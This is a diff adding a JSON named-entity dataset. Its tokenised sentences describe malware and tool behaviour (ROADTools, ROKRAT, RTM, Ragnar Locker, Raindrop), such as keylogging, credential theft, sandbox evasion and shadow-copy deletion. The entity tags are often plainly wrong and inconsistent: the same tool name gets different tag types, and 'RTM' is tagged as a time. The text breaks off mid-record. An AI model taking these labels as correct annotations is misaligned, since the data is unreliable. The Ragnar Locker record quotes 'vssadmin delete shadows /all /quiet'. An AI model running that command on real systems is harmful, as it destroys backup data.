"tokens": [ + "ROADTools", + "automatically", + "gathers", + "data", + "from", + "Azure", + "AD", + "environments", + "using", + "the", + "Azure", + "Graph", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ROADTools", + "can", + "enumerate", + "Azure", + "AD", + "users." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Org", + "B-HackOrg", + "B-Org" + ] + }, + { + "tokens": [ + "ROADTools", + "leverages", + "valid", + "cloud", + "credentials", + "to", + "perform", + "enumeration", + "operations", + "using", + "the", + "internal", + "Azure", + "AD", + "Graph", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ROADTools", + "can", + "enumerate", + "Azure", + "AD", + "groups." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Idus", + "I-HackOrg", + "O" + ] + }, + { + "tokens": [ + "ROADTools", + "can", + "enumerate", + "Azure", + "AD", + "applications", + "and", + "service", + "principals." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROADTools", + "can", + "enumerate", + "Azure", + "AD", + "systems", + "and", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROCKBOOT", + "is", + "a", + "Master", + "Boot", + "Record", + "(MBR)", + "bootkit", + "that", + "uses", + "the", + "MBR", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "use", + "the", + "`GetForegroundWindow`", + "and", + "`GetWindowText`", + "APIs", + "to", + "discover", + "where", + "the", + "user", + "is", + "typing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "has", + "an", + "audio", + "capture", + "and", + "eavesdropping", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "has", + "used", + "legitimate", + "social", + "networking", + "sites", + "and", + "cloud", + "platforms", + "(including", + "but", + "not", + "limited", + "to", + "Twitter,", + "Yandex,", + "Dropbox,", + "and", + "Mediafire)", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "extract", + "clipboard", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "steal", + "credentials", + "stored", + "in", + "Web", + "browsers", + "by", + "querying", + "the", + "sqlite", + "database." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "collect", + "host", + "data", + "and", + "specific", + "file", + "types." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "check", + "for", + "debugging", + "tools." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "decrypt", + "strings", + "using", + "the", + "victim's", + "hostname", + "as", + "the", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "relies", + "on", + "a", + "specific", + "victim", + "hostname", + "to", + "execute", + "and", + "decrypt", + "important", + "strings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "send", + "collected", + "files", + "back", + "over", + "same", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "send", + "collected", + "data", + "to", + "cloud", + "storage", + "services", + "such", + "as", + "PCloud." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "request", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "ROKRAT", + "has", + "the", + "ability", + "to", + "gather", + "a", + "list", + "of", + "files", + "and", + "directories", + "on", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "retrieve", + "additional", + "malicious", + "payloads", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "use", + "`SetWindowsHookEx`", + "and", + "`GetKeyNameText`", + "to", + "capture", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "B-Purp" + ] + }, + { + "tokens": [ + "ROKRAT", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "attachment", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "modify", + "the", + "`HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\`", + "registry", + "key", + "so", + "it", + "can", + "bypass", + "the", + "VB", + "object", + "model", + "(VBOM)", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "use", + "a", + "variety", + "of", + "API", + "calls", + "to", + "execute", + "shellcode." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Tool", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "encrypt", + "data", + "prior", + "to", + "exfiltration", + "by", + "using", + "an", + "RSA", + "public", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "list", + "the", + "current", + "running", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "use", + "`VirtualAlloc`,", + "`WriteProcessMemory`,", + "and", + "then", + "`CreateRemoteThread`", + "to", + "execute", + "shellcode", + "within", + "the", + "address", + "space", + "of", + "`Notepad.exe`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "access", + "the", + "<code>HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData</code>", + "Registry", + "key", + "to", + "obtain", + "the", + "System", + "manufacturer", + "value", + "to", + "identify", + "the", + "machine", + "type." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "capture", + "screenshots", + "of", + "the", + "infected", + "system", + "using", + "the", + "`gdi32`", + "library." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "has", + "been", + "delivered", + "via", + "spearphishing", + "emails", + "that", + "contain", + "a", + "malicious", + "Hangul", + "Office", + "or", + "Microsoft", + "Word", + "document." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "check", + "for", + "VMware-related", + "files", + "and", + "DLLs", + "related", + "to", + "sandboxes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "gather", + "the", + "hostname", + "and", + "the", + "OS", + "version", + "to", + "ensure", + "it", + "doesn’t", + "run", + "on", + "a", + "Windows", + "XP", + "or", + "Windows", + "Server", + "2003", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "collect", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "has", + "used", + "Visual", + "Basic", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "for", + "command", + "and", + "control", + "communication." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ROKRAT", + "can", + "steal", + "credentials", + "by", + "leveraging", + "the", + "Windows", + "Vault", + "mechanism." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RTM", + "monitors", + "browsing", + "activity", + "and", + "automatically", + "captures", + "screenshots", + "if", + "a", + "victim", + "browses", + "to", + "a", + "URL", + "matching", + "one", + "of", + "a", + "list", + "of", + "strings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "attempt", + "to", + "run", + "the", + "program", + "as", + "admin,", + "then", + "show", + "a", + "fake", + "error", + "message", + "and", + "a", + "legitimate", + "UAC", + "bypass", + "prompt", + "to", + "the", + "user", + "in", + "an", + "attempt", + "to", + "socially", + "engineer", + "the", + "user", + "into", + "escalating", + "privileges." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "the", + "ability", + "to", + "remove", + "Registry", + "entries", + "that", + "it", + "created", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "collects", + "data", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "samples", + "have", + "been", + "signed", + "with", + "a", + "code-signing", + "certificates." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "used", + "an", + "RSS", + "feed", + "on", + "Livejournal", + "to", + "update", + "a", + "list", + "of", + "encrypted", + "C2", + "server", + "names.", + "RTM", + "has", + "also", + "hidden", + "Pony", + "C2", + "server", + "IP", + "addresses", + "within", + "transactions", + "on", + "the", + "Bitcoin", + "and", + "Namecoin", + "blockchain." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "search", + "for", + "specific", + "strings", + "within", + "browser", + "tabs", + "using", + "a", + "Dynamic", + "Data", + "Exchange", + "mechanism." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "resolved", + "Pony", + "C2", + "server", + "IP", + "addresses", + "by", + "either", + "converting", + "Bitcoin", + "blockchain", + "transaction", + "data", + "to", + "specific", + "octets,", + "or", + "accessing", + "IP", + "addresses", + "directly", + "within", + "the", + "Namecoin", + "blockchain." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-HackOrg", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "delete", + "all", + "files", + "created", + "during", + "its", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "check", + "for", + "specific", + "files", + "and", + "directories", + "associated", + "with", + "virtualization", + "and", + "malware", + "analysis." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "add", + "a", + "certificate", + "to", + "the", + "Windows", + "store." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "record", + "keystrokes", + "from", + "both", + "the", + "keyboard", + "and", + "virtual", + "keyboard." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "relied", + "on", + "users", + "opening", + "malicious", + "email", + "attachments,", + "decompressing", + "the", + "attached", + "archive,", + "and", + "double-clicking", + "the", + "executable", + "within." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "named", + "the", + "scheduled", + "task", + "it", + "creates", + "\"Windows", + "Update\"." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "been", + "delivered", + "as", + "archived", + "Windows", + "executable", + "files", + "masquerading", + "as", + "PDF", + "documents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "delete", + "all", + "Registry", + "entries", + "created", + "during", + "its", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "use", + "the", + "<code>FindNextUrlCacheEntryA</code>", + "and", + "<code>FindFirstUrlCacheEntryA</code>", + "functions", + "to", + "search", + "for", + "specific", + "strings", + "within", + "browser", + "history." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "used", + "Port", + "44443", + "for", + "its", + "VNC", + "module." + ], + "ner_tags": [ + "B-Org", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "strings,", + "network", + "data,", + "configuration,", + "and", + "modules", + "are", + "encrypted", + "with", + "a", + "modified", + "RC4", + "algorithm.", + "RTM", + "has", + "also", + "been", + "delivered", + "to", + "targets", + "as", + "various", + "archive", + "files", + "including", + "ZIP,", + "7-ZIP,", + "and", + "RAR." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RTM", + "can", + "obtain", + "a", + "list", + "of", + "smart", + "card", + "readers", + "attached", + "to", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "obtain", + "information", + "about", + "process", + "integrity", + "levels." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "tries", + "to", + "add", + "a", + "Registry", + "Run", + "key", + "under", + "the", + "name", + "\"Windows", + "Update\"", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "the", + "capability", + "to", + "download", + "a", + "VNC", + "module", + "from", + "command", + "and", + "control", + "(C2)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "runs", + "its", + "core", + "DLL", + "file", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "RTM", + "tries", + "to", + "add", + "a", + "scheduled", + "task", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "RTM", + "can", + "obtain", + "information", + "about", + "security", + "software", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "scan", + "victim", + "drives", + "to", + "look", + "for", + "specific", + "banking", + "software", + "on", + "the", + "machine", + "to", + "determine", + "next", + "actions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "been", + "delivered", + "via", + "spearphishing", + "attachments", + "disguised", + "as", + "PDF", + "documents." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "encrypts", + "C2", + "traffic", + "with", + "a", + "custom", + "RC4", + "variant." + ], + "ner_tags": [ + "B-Way", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "obtain", + "the", + "computer", + "name,", + "OS", + "version,", + "and", + "default", + "language", + "identifier." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "obtain", + "the", + "victim", + "username", + "and", + "permissions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "obtain", + "the", + "victim", + "time", + "zone." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "can", + "detect", + "if", + "it", + "is", + "running", + "within", + "a", + "sandbox", + "or", + "other", + "virtualized", + "analysis", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RTM", + "has", + "initiated", + "connections", + "to", + "external", + "domains", + "using", + "HTTPS." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RTM", + "uses", + "the", + "command", + "line", + "and", + "rundll32.exe", + "to", + "execute." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "encrypts", + "files", + "on", + "the", + "local", + "machine", + "and", + "mapped", + "drives", + "prior", + "to", + "displaying", + "a", + "note", + "demanding", + "a", + "ransom." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "attempted", + "to", + "terminate/stop", + "processes", + "and", + "services", + "associated", + "with", + "endpoint", + "security", + "products." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "can", + "delete", + "volume", + "shadow", + "copies", + "using", + "<code>vssadmin", + "delete", + "shadows", + "/all", + "/quiet</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "been", + "delivered", + "as", + "an", + "unsigned", + "MSI", + "package", + "that", + "was", + "executed", + "with", + "<code>msiexec.exe</code>." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "may", + "attempt", + "to", + "connect", + "to", + "removable", + "drives", + "and", + "mapped", + "network", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "used", + "regsvr32.exe", + "to", + "execute", + "components", + "of", + "VirtualBox." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "used", + "VirtualBox", + "and", + "a", + "stripped", + "Windows", + "XP", + "virtual", + "machine", + "to", + "run", + "itself.", + "The", + "use", + "of", + "a", + "shared", + "folder", + "specified", + "in", + "the", + "configuration", + "enables", + "Ragnar", + "Locker", + "to", + "encrypt", + "files", + "on", + "the", + "host", + "operating", + "system,", + "including", + "files", + "on", + "any", + "mapped", + "drives." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "components", + "of", + "VirtualBox." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "used", + "sc.exe", + "to", + "execute", + "a", + "service", + "that", + "it", + "creates." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "attempted", + "to", + "stop", + "services", + "associated", + "with", + "business", + "applications", + "and", + "databases", + "to", + "release", + "the", + "lock", + "on", + "files", + "used", + "by", + "these", + "applications", + "so", + "they", + "may", + "be", + "encrypted." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Before", + "executing", + "malicious", + "code,", + "Ragnar", + "Locker", + "checks", + "the", + "Windows", + "API", + "<code>GetLocaleInfoW</code>", + "and", + "doesn't", + "encrypt", + "files", + "if", + "it", + "finds", + "a", + "former", + "Soviet", + "country." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Area", + "I-Area", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "used", + "cmd.exe", + "and", + "batch", + "scripts", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ragnar", + "Locker", + "has", + "used", + "sc.exe", + "to", + "create", + "a", + "new", + "service", + "for", + "the", + "VirtualBox", + "driver." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Raindrop", + "decrypted", + "its", + "Cobalt", + "Strike", + "payload", + "using", + "an", + "AES-256", + "encryption", + "algorithm", + "in", + "CBC", + "mode", + "with", + "a", + "unique", + "key", + "per", + "sample." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Raindrop", + "encrypted", + "its", + "payload", + "using", + "a", + "simple", + "XOR", + "algorithm", + "with", + "a", + "single-byte", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Raindrop", + "was", + "built", + "to", + "include", + "a", + "modified", + "version", + "of", + "7-Zip", + "source", + "code", + "(including", + "associated", + "export", + "names)", + "and", + "Far", + "Manager", + "source", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Raindrop", + "was", + "installed", + "under", + "names", + "that", + 